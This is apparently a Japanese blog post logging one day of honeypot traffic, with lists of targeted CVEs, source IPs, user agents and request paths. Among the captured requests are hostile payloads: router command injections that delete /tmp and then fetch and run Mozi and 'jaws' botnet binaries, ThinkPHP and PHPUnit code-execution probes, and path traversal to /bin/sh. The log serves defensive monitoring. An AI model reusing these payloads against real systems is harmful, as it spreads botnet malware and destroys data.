はてなブログに投稿しました。#ハニポで夜更かし
ハニーポット(仮) 観測記録 2022/06/10分です。
特徴
共通
Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
.jsへのスキャン行為
/.envへのスキャン行為
/.gitへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
Location:JP
D-link製品の脆弱性を狙うアクセス
JBossの脆弱性を狙うアクセス
curlによるスキャン行為
zgrabによるスキャン行為
/.awsへのスキャン行為
Apache Tomcatへのスキャン行為
WordPressへのスキャン行為
110.242.68.4に関する不正通信
を確認しました。
Location:US
D-link製品の脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
Anarchy99によるスキャン行為
curlによるスキャン行為
zgrabによるスキャン行為
/.awsへのスキャン行為
phpMyAdminへのスキャン行為
110.242.68.4に関する不正通信
を確認しました。
Location:UK
GPONルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Tomcatへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 0.0.0.0/jaws; sh /tmp/jaws
Location:SG
Atlassian Jira Server/Data Centerの脆弱性(CVE-2021-26086)を狙うアクセス
D-link製品の脆弱性を狙うアクセス
Drupalの脆弱性(CVE-2018-7600)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Spring Bootの脆弱性を狙うアクセス
aiohttpによるスキャン行為
zgrabによるスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http://192.168.1.1:8088/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
他
アクセス数推移
JP:総アクセス数:156 (前日比:56)
US:総アクセス数:223 (前日比:168)
UK:総アクセス数:55 (前日比:18)
SG:総アクセス数:95 (前日比:-89)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 5.252.194.39 | Russia |
3 | 20.70.163.40 | United States |
1 | 23.236.203.87 | Canada |
1 | 23.251.102.74 | United States |
1 | 36.248.89.215 | China |
20 | 40.88.43.240 | United States |
1 | 44.201.93.179 | United States |
1 | 45.95.55.50 | Germany |
1 | 45.143.200.118 | Russia |
1 | 51.104.54.183 | United Kingdom |
1 | 51.159.152.255 | France |
1 | 54.157.219.131 | United States |
1 | 58.247.217.21 | China |
1 | 59.55.155.4 | China |
1 | 60.17.105.54 | China |
1 | 60.17.112.90 | China |
1 | 61.147.15.65 | China |
3 | 61.147.15.67 | China |
1 | 61.147.15.76 | China |
15 | 95.214.235.205 | Ukraine |
9 | 103.99.205.88 | India |
1 | 108.4.17.241 | United States |
2 | 109.237.103.9 | Russia |
2 | 109.237.103.123 | Russia |
1 | 110.53.241.164 | China |
1 | 111.224.235.22 | China |
1 | 112.66.109.125 | China |
1 | 113.160.222.61 | Vietnam |
1 | 114.230.88.118 | China |
1 | 122.189.140.24 | China |
1 | 123.128.134.181 | China |
12 | 125.133.48.123 | South Korea |
1 | 132.145.39.16 | United States |
8 | 135.125.244.48 | France |
8 | 135.125.246.110 | France |
1 | 137.184.226.64 | United States |
1 | 138.197.104.115 | United States |
7 | 139.59.64.16 | Singapore |
1 | 143.198.28.172 | United States |
1 | 143.198.98.147 | United States |
1 | 143.198.155.121 | United States |
1 | 149.129.50.37 | Singapore |
1 | 150.255.122.221 | China |
2 | 157.245.70.127 | United States |
1 | 159.223.35.44 | United States |
1 | 165.232.137.126 | United States |
1 | 174.138.52.43 | United States |
1 | 179.43.142.156 | Panama |
1 | 179.220.55.201 | Brazil |
6 | 185.156.72.6 | Russia |
1 | 192.241.206.26 | United States |
1 | 192.241.206.144 | United States |
1 | 193.56.29.120 | United Kingdom |
11 | 193.106.191.48 | Russia |
1 | 193.118.53.194 | United States |
1 | 193.142.59.15 | Germany |
4 | 205.185.118.29 | United States |
1 | 205.210.31.26 | United States |
1 | 220.250.62.78 | China |
UserAgent一覧
件数 | UserAgent |
---|---|
13 | - |
1 | Abyssal |
1 | Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K) |
1 | MMozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.2.24) Gecko/20111103 Firefox/3.6.24 |
5 | Mozila/5.0 |
1 | Mozilla/3.0 NAVIO_AOLTV (11; 13; Philips; PH200; 1; R2.0C36_AOL.0110OPTIK; R2.0.0139d_OPTIK) |
1 | Mozilla/5.0 (Linux; Android 6.0; LENNY3 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.85 Mobile Safari/537.36 |
18 | Mozilla/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 |
5 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
5 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML |
18 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:50.0) Gecko/20100101 Firefox/50.0 |
9 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 |
46 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
3 | Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0 |
1 | Mozilla/5.0 (iPod; CPU iPhone OS 6_1_6 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10B500 Safari/8536.25 |
2 | Mozilla/5.0 AppleWebKit/537.73 (KHTML, like Gecko) |
2 | Mozilla/5.0 zgrab/0.x |
1 | Mozilla/5.01682558 Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/537.36(KHTML, like Gecko) Chrome/40.0.2214.89 Safari/537.36 |
1 | P3P Validator |
4 | PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3 |
1 | Roku/DVP-9.10 (289.10E04111A) |
1 | curl/7.68.0 |
1 | python-requests/2.22.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | \x03 |
||
2 | \x16\x03\x01\x01D\x01 |
||
7 | \x16\x03\x01 |
||
1 | CONNECT | cn[.]bing[.]com:443 |
HTTP/1.1 |
1 | CONNECT | www[.]baidu[.]com:443 |
HTTP/1.1 |
1 | CONNECT | www[.]so[.]com:443 |
HTTP/1.1 |
1 | CONNECT | www[.]voanews[.]com:443 |
HTTP/1.1 |
2 | GET | /.aws/credentials |
HTTP/1.1 |
2 | GET | /.env.bak |
HTTP/1.1 |
47 | GET | /.env |
HTTP/1.1 |
2 | GET | /.git/config |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=ja1oj0st |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
3 | GET | /_profiler/phpinfo |
HTTP/1.1 |
1 | GET | /ab2g |
HTTP/1.1 |
1 | GET | /ab2h |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
2 | GET | /aws.yml |
HTTP/1.1 |
3 | GET | /blog/ |
HTTP/1.1 |
3 | GET | /blog/robots.txt |
HTTP/1.1 |
1 | GET | /c/version.js |
HTTP/1.1 |
2 | GET | /config.js |
HTTP/1.1 |
2 | GET | /config/aws.yml |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
4 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /flu/403.html |
HTTP/1.1 |
1 | GET | /hudson |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
2 | GET | /info.php |
HTTP/1.1 |
1 | GET | /invoker/readonly |
HTTP/1.1 |
1 | GET | /jenkins/login |
HTTP/1.1 |
1 | GET | /login |
HTTP/1.1 |
1 | GET | /manager/html |
HTTP/1.1 |
2 | GET | /phpinfo.php |
HTTP/1.1 |
2 | GET | /phpinfo |
HTTP/1.1 |
1 | GET | /portal/redlion |
HTTP/1.1 |
3 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /script |
HTTP/1.1 |
1 | GET | /solr/ |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /stalker_portal/c/version.js |
HTTP/1.1 |
1 | GET | /stream/live.php |
HTTP/1.1 |
1 | GET | /streaming/clients_live.php |
HTTP/1.1 |
1 | GET | /system_api.php |
HTTP/1.1 |
1 | GET | /users/sign_in |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | GET | /video/26176.html |
HTTP/1.1 |
1 | GET | /webfig/ |
HTTP/1.1 |
4 | GET | /wordpress/ |
HTTP/1.1 |
4 | GET | /wp/ |
HTTP/1.1 |
3 | GET | /xmlrpc.php?rsd |
HTTP/1.1 |
1 | GET | /yuuki?pp=env |
HTTP/1.1 |
1 | GET | http[:]//dongtaiwang[.]com/ |
HTTP/1.1 |
1 | GET | http[:]//www[.]1ucn[.]com/proxychecker/index.php |
HTTP/1.1 |
1 | GET | http[:]//www[.]minghui[.]org/ |
HTTP/1.1 |
1 | GET | http[:]//www[.]rfa[.]org/english/ |
HTTP/1.1 |
1 | GET | http[:]//www[.]soso[.]com/ |
HTTP/1.1 |
1 | GET | http[:]//www[.]wujieliulan[.]com/ |
HTTP/1.1 |
1 | HEAD | / |
HTTP/1.0 |
1 | HEAD | / |
HTTP/1.1 |
1 | HEAD | http[:]//110[.]242[.]68[.]4/ |
HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
1 | POST | /HNAP1/ |
HTTP/1.1 |
1 | POST | /_ignition/execute-solution |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
5 | POST | /editBlackAndWhiteList |
HTTP/1.1 |
2 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
Location:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 1.85.218.185 | China |
1 | 35.172.150.167 | United States |
1 | 45.141.157.180 | Bulgaria |
1 | 45.143.200.118 | Russia |
1 | 45.154.255.138 | United Kingdom |
5 | 50.31.21.5 | United States |
8 | 51.79.29.48 | Canada |
1 | 51.159.152.255 | France |
40 | 54.151.130.189 | United States |
1 | 59.96.45.83 | India |
1 | 69.70.75.46 | Canada |
1 | 74.208.245.61 | United States |
1 | 92.255.85.183 | Hong Kong |
1 | 94.232.40.40 | Russia |
2 | 109.237.103.9 | Russia |
1 | 110.249.201.162 | China |
1 | 112.94.191.137 | China |
1 | 119.163.44.211 | China |
1 | 124.90.48.107 | China |
1 | 128.1.248.42 | United States |
1 | 128.14.141.34 | United States |
1 | 143.198.227.218 | United States |
1 | 144.255.31.45 | China |
2 | 157.245.70.127 | United States |
1 | 162.142.125.9 | United States |
1 | 162.142.125.212 | United States |
1 | 164.92.85.122 | United States |
1 | 167.94.138.61 | United States |
1 | 167.94.146.59 | United States |
1 | 171.36.140.251 | China |
1 | 175.184.164.35 | China |
1 | 179.43.142.156 | Panama |
1 | 181.214.218.35 | United States |
1 | 183.184.235.90 | China |
8 | 185.254.196.223 | Ukraine |
1 | 189.139.79.148 | Mexico |
1 | 192.241.213.228 | United States |
1 | 192.241.221.108 | United States |
1 | 192.241.221.236 | United States |
2 | 193.56.29.170 | United Kingdom |
11 | 193.106.191.48 | Russia |
1 | 205.210.31.18 | United States |
7 | 206.189.205.4 | United States |
1 | 212.102.35.7 | United Kingdom |
1 | 220.200.176.170 | China |
1 | 221.234.209.134 | China |
101 | 223.13.160.140 | China |
UserAgent一覧
件数 | UserAgent |
---|---|
14 | - |
1 | Anarchy99 |
2 | Mozila/5.0 |
1 | Mozilla/5.0 (Linux; Android 11; M2003J15SC) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.58 Mobile Safari/537.36 |
1 | Mozilla/5.0 (Linux; Android 4.4.2; RKM MK902 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 |
1 | Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https[:]//zhanzhang[.]toutiao[.]com/) |
1 | Mozilla/5.0 (Linux; Android 8.1.0; Moto G (5S) Plus) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36 |
3 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
4 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 |
101 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
40 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
5 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 |
11 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
18 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0 (Chrome) |
5 | Mozilla/5.0 (iPhone; CPU iPhone OS 11_4 like Mac OS X) AppleWebKit/604.1.34 (KHTML, like Gecko) Mobile/15F79 Safari/604.1 |
3 | Mozilla/5.0 zgrab/0.x |
1 | Mozilla/5.01712517 Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 |
4 | PycURL/7.43.0 libcurl/7.47.0 GnuTLS/3.4.10 zlib/1.2.8 libidn/1.32 librtmp/2.3 |
1 | VLC/3.0.8 LibVLC/3.0.8 |
1 | Wget/1.14 (linux-gnu) |
1 | curl/7.68.0 |
1 | python-requests/2.22.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - |
||
3 | \x03 |
||
1 | \x16\x03\x01\x01D\x01 |
||
1 | \x16\x03\x01 |
||
1 | CONNECT | cn[.]bing[.]com:443 |
HTTP/1.1 |
1 | CONNECT | www[.]baidu[.]com:443 |
HTTP/1.1 |
1 | CONNECT | www[.]so[.]com:443 |
HTTP/1.1 |
1 | CONNECT | www[.]voanews[.]com:443 |
HTTP/1.1 |
1 | GET | /.aws/credentials |
HTTP/1.1 |
1 | GET | /.env.bak |
HTTP/1.1 |
1 | GET | /.env.dev |
HTTP/1.1 |
1 | GET | /.env.dist |
HTTP/1.1 |
1 | GET | /.env.local |
HTTP/1.1 |
23 | GET | /.env |
HTTP/1.1 |
2 | GET | /.git/config |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /HNAP1 |
HTTP/1.1 |
1 | GET | /Public/home/js/check.js |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /_profiler/phpinfo |
HTTP/1.1 |
1 | GET | /ab2g |
HTTP/1.1 |
1 | GET | /ab2h |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /actuator/health |
HTTP/1.1 |
1 | GET | /admin/.env |
HTTP/1.1 |
1 | GET | /api/.env |
HTTP/1.1 |
1 | GET | /asdf.php |
HTTP/1.1 |
1 | GET | /beta/.env |
HTTP/1.1 |
1 | GET | /c/version.js |
HTTP/1.1 |
1 | GET | /config.env |
HTTP/1.1 |
1 | GET | /config.json |
HTTP/1.1 |
1 | GET | /config/config.json |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
1 | GET | /dashboard/phpinfo.php |
HTTP/1.1 |
1 | GET | /debug/default/view?panel=config |
HTTP/1.1 |
1 | GET | /evox/about |
HTTP/1.1 |
1 | GET | /flu/403.html |
HTTP/1.1 |
1 | GET | /frontend_dev.php/$ |
HTTP/1.1 |
1 | GET | /hudson |
HTTP/1.1 |
1 | GET | /i.php |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /info.json |
HTTP/1.1 |
1 | GET | /info.php |
HTTP/1.1 |
1 | GET | /infophp.php |
HTTP/1.1 |
1 | GET | /infos.php |
HTTP/1.1 |
1 | GET | /kyc/.env |
HTTP/1.1 |
1 | GET | /laravel/.env |
HTTP/1.1 |
1 | GET | /laravel/core/.env |
HTTP/1.1 |
1 | GET | /linusadmin-phpinfo.php |
HTTP/1.1 |
1 | GET | /nmaplowercheck1654745908 |
HTTP/1.1 |
1 | GET | /old_phpinfo.php |
HTTP/1.1 |
1 | GET | /php-info.php |
HTTP/1.1 |
1 | GET | /php.ini |
HTTP/1.1 |
1 | GET | /php.php |
HTTP/1.1 |
1 | GET | /phpinfo.php |
HTTP/1.1 |
1 | GET | /phpinfo |
HTTP/1.1 |
101 | GET | /phpmyadmin/ |
HTTP/1.1 |
1 | GET | /phpversion.php |
HTTP/1.1 |
1 | GET | /pinfo.php |
HTTP/1.1 |
1 | GET | /portal/redlion |
HTTP/1.1 |
1 | GET | /prod/.env |
HTTP/1.1 |
1 | GET | /public/.env |
HTTP/1.1 |
1 | GET | /robots.txt |
HTTP/1.1 |
1 | GET | /solr/ |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /stalker_portal/c/version.js |
HTTP/1.1 |
1 | GET | /stream/live.php |
HTTP/1.1 |
1 | GET | /streaming/clients_live.php |
HTTP/1.1 |
1 | GET | /system_api.php |
HTTP/1.1 |
1 | GET | /temp.php |
HTTP/1.1 |
1 | GET | /test.php |
HTTP/1.1 |
1 | GET | /time.php |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | GET | /video/26176.html |
HTTP/1.1 |
1 | GET | /webfig/ |
HTTP/1.1 |
1 | GET | /wp-config.php.bak |
HTTP/1.1 |
1 | GET | http[:]//www[.]minghui[.]org/ |
HTTP/1.1 |
1 | GET | http[:]//www[.]rfa[.]org/english/ |
HTTP/1.1 |
1 | GET | http[:]//www[.]soso[.]com/ |
HTTP/1.1 |
1 | GET | http[:]//www[.]wujieliulan[.]com/ |
HTTP/1.1 |
3 | HEAD | / |
HTTP/1.1 |
1 | HEAD | / |
HTTP/1.0 |
1 | HEAD | http[:]//110[.]242[.]68[.]4/ |
HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
1 | POST | /HNAP1/ |
HTTP/1.0 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
2 | POST | /editBlackAndWhiteList |
HTTP/1.1 |
1 | POST | /sdk |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
4 | PRI | * |
HTTP/2.0 |
Location:UK
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 45.143.200.118 | Russia |
1 | 59.19.247.195 | South Korea |
1 | 59.36.168.250 | China |
1 | 66.115.182.73 | United States |
1 | 66.240.192.82 | United States |
1 | 92.255.85.183 | Hong Kong |
1 | 104.131.18.211 | United States |
4 | 109.237.103.9 | Russia |
2 | 109.237.103.123 | Russia |
1 | 111.51.8.29 | China |
1 | 114.67.249.200 | China |
1 | 117.195.94.212 | India |
1 | 120.27.248.34 | China |
1 | 120.85.91.120 | China |
1 | 123.11.78.96 | China |
1 | 128.1.248.26 | United States |
1 | 128.14.133.58 | United States |
1 | 143.244.191.38 | United States |
1 | 144.126.215.244 | United States |
2 | 157.230.216.203 | United States |
1 | 162.142.125.219 | United States |
7 | 165.22.228.162 | United States |
1 | 170.253.2.246 | Spain |
1 | 179.43.142.156 | Panama |
1 | 188.165.87.107 | France |
1 | 192.241.209.16 | United States |
1 | 192.241.213.20 | United States |
11 | 193.106.191.48 | Russia |
1 | 193.124.7.9 | Czechia |
5 | 208.100.26.232 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
15 | - |
1 | Go-http-client/1.1 |
1 | Hello, world |
1 | Mozila/5.0 |
1 | Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G532M Build/MMB29T) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/7.2 Chrome/59.0.3071.125 Mobile Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0 |
2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 |
5 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 |
16 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b4pre) Gecko/20100815 Minefield/4.0b4pre |
1 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 |
5 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
1 | Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0 |
2 | Mozilla/5.0 zgrab/0.x |
1 | Roku/DVP-9.10 (289.10E04111A) |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | - |
||
2 | \x03 |
||
3 | \x16\x03\x01\x01D\x01 |
||
1 | \x16\x03\x01 |
||
5 | GET | /.env |
HTTP/1.1 |
1 | GET | /.git/config |
HTTP/1.1 |
1 | GET | /?XDEBUG_SESSION_START=phpstorm |
HTTP/1.1 |
1 | GET | /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> |
HTTP/1.1 |
1 | GET | /HNAP1 |
HTTP/1.1 |
1 | GET | /_ignition/execute-solution |
HTTP/1.1 |
1 | GET | /ab2g |
HTTP/1.1 |
1 | GET | /ab2h |
HTTP/1.1 |
1 | GET | /actuator/gateway/routes |
HTTP/1.1 |
1 | GET | /actuator/health |
HTTP/1.1 |
1 | GET | /boaform/admin/formLogin?username=ec8&psd=ec8 |
HTTP/1.0 |
1 | GET | /c/version.js |
HTTP/1.1 |
1 | GET | /console/ |
HTTP/1.1 |
1 | GET | /evox/about |
HTTP/1.1 |
2 | GET | /favicon.ico |
HTTP/1.1 |
1 | GET | /flu/403.html |
HTTP/1.1 |
1 | GET | /hudson |
HTTP/1.1 |
1 | GET | /hunmj_serverApi/test.php |
HTTP/1.1 |
1 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 |
HTTP/1.1 |
1 | GET | /manager/html |
HTTP/1.1 |
1 | GET | /nmaplowercheck1654735844 |
HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//123[.]11[.]78[.]96:51794/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 |
HTTP/1.0 |
1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+0[.]0[.]0[.]0/jaws;sh+/tmp/jaws |
HTTP/1.1 |
1 | GET | /solr/ |
HTTP/1.1 |
1 | GET | /solr/admin/info/system?wt=json |
HTTP/1.1 |
1 | GET | /stalker_portal/c/version.js |
HTTP/1.1 |
1 | GET | /stream/live.php |
HTTP/1.1 |
1 | GET | /streaming/clients_live.php |
HTTP/1.1 |
1 | GET | /system_api.php |
HTTP/1.1 |
1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
2 | GET | /video/26176.html |
HTTP/1.1 |
1 | GET | /webfig/ |
HTTP/1.1 |
1 | GET | http[:]//example[.]com/ |
HTTP/1.1 |
1 | HEAD | / |
HTTP/1.0 |
1 | HEAD | / |
HTTP/1.1 |
1 | POST | /Autodiscover/Autodiscover.xml |
HTTP/1.1 |
1 | POST | /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh |
HTTP/1.1 |
1 | POST | /editBlackAndWhiteList |
HTTP/1.1 |
1 | POST | /sdk |
HTTP/1.1 |
1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
HTTP/1.1 |
1 | PRI | * |
HTTP/2.0 |
Location:SG
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 2.56.57.72 | Netherlands |
1 | 2.139.161.243 | Spain |
1 | 13.67.208.62 | United States |
1 | 23.251.102.74 | United States |
6 | 37.0.8.54 | Netherlands |
1 | 45.143.200.118 | Russia |
11 | 51.79.29.48 | Canada |
1 | 66.240.192.82 | United States |
1 | 77.24.101.229 | Germany |
13 | 85.159.212.107 | United States |
1 | 89.248.173.131 | United Kingdom |
1 | 92.255.85.183 | Hong Kong |
1 | 94.232.40.40 | Russia |
1 | 103.5.126.21 | Cambodia |
2 | 109.237.103.9 | Russia |
2 | 109.237.103.123 | Russia |
1 | 113.91.147.48 | China |
2 | 128.199.10.218 | United Kingdom |
1 | 134.122.6.44 | United States |
1 | 137.184.226.64 | United States |
1 | 142.93.66.174 | United States |
1 | 143.198.179.189 | United States |
2 | 157.230.216.203 | United States |
1 | 162.142.125.8 | United States |
1 | 162.142.125.211 | United States |
7 | 167.71.36.249 | United States |
1 | 172.104.138.223 | United States |
1 | 178.72.78.123 | Russia |
1 | 179.43.142.156 | Panama |
8 | 185.254.196.223 | Ukraine |
1 | 192.241.205.169 | United States |
1 | 192.241.222.147 | United States |
1 | 192.241.222.214 | United States |
2 | 193.56.29.170 | United Kingdom |
11 | 193.106.191.48 | Russia |
1 | 193.118.53.202 | United States |
1 | 193.124.7.9 | Czechia |
1 | 194.28.112.135 | Moldova |
1 | 194.31.98.60 | Netherlands |
1 | 198.235.24.30 | United States |
UserAgent一覧
件数 | UserAgent |
---|---|
21 | - |
12 | Go-http-client/1.1 |
1 | Hello, world |
1 | Mozila/5.0 |
1 | Mozilla/5.0 (Linux; Android 9; CPH1859) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.143 Mobile Safari/537.36 |
1 | Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 |
